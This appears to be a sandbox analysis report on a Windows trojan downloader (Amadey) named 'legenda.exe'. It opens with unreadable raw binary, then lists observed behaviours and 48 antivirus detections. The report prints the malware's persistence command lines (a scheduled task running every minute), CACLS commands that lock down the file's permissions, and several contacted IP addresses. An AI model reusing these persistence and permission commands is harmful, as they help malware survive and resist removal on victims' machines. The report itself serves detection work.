MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 13, 2023, 9:40 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F

Communicates with host for which no DNS query was performed (4 events)

host	103.114.163.134
host	179.43.155.247
host	62.204.41.87
host	62.204.41.88

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	cmd /k echo Y\|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y\|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit
cmdline	CACLS "legenda.exe" /P "test22:R" /E
cmdline	CACLS "legenda.exe" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y\|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit
cmdline	CACLS "..\f22b669919" /P "test22:R" /E
cmdline	CACLS "..\f22b669919" /P "test22:N"

File has been identified by 48 AntiVirus engines on VirusTotal as malicious (48 events)

MicroWorld-eScan	Gen:Variant.Doina.45665
CAT-QuickHeal	Trojandownloader.Deyma
ALYac	Gen:Variant.Doina.45665
Malwarebytes	Trojan.MalPack
VIPRE	Gen:Variant.Doina.45665
Sangfor	Trojan.Win32.Save.a
Alibaba	TrojanDownloader:Win32/Deyma.97085975
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Trojan.Doina.DB261
VirIT	Trojan.Win32.Genus.OAG
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/TrojanDownloader.Amadey.A
Cynet	Malicious (score: 100)
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Downloader.Win32.Deyma.gen
BitDefender	Gen:Variant.Doina.45665
NANO-Antivirus	Trojan.Win32.Deyma.jvdhne
Avast	Win32:Evo-gen [Trj]
Tencent	Win32.Trojan-Downloader.Deyma.Wmhl
Sophos	Generic ML PUA (PUA)
DrWeb	Trojan.MulDrop21.48586
TrendMicro	TROJ_GEN.R002C0DCB23
McAfee-GW-Edition	BehavesLike.Win32.Generic.dh
Trapmine	suspicious.low.ml.score
FireEye	Generic.mg.5086db99de54fca2
Emsisoft	Gen:Variant.Doina.45665 (B)
Ikarus	Win32.Outbreak
Antiy-AVL	Trojan[Downloader]/Win32.Amadey
Gridinsoft	Trojan.Win32.Downloader.sa
Microsoft	Trojan:Win32/Amadey.CD!MTB
ViRobot	Trojan.Win.Z.Doina.241152.C
GData	Gen:Variant.Doina.45665
Google	Detected
AhnLab-V3	Trojan/Win.Generic.C5234847
Acronis	suspicious
McAfee	Artemis!5086DB99DE54
MAX	malware (ai score=89)
Cylance	unsafe
TrendMicro-HouseCall	TrojanSpy.Win32.REDLINE.YXDCMZ
Rising	Downloader.Amadey!8.125AC (TFE:5:HlAGNWrdXqP)
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Injector.EGTS!tr
BitDefenderTheta	Gen:NN.ZexaF.36308.ouW@aaXKpqni
AVG	Win32:Evo-gen [Trj]
Panda	Trj/GdSda.A

lega.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All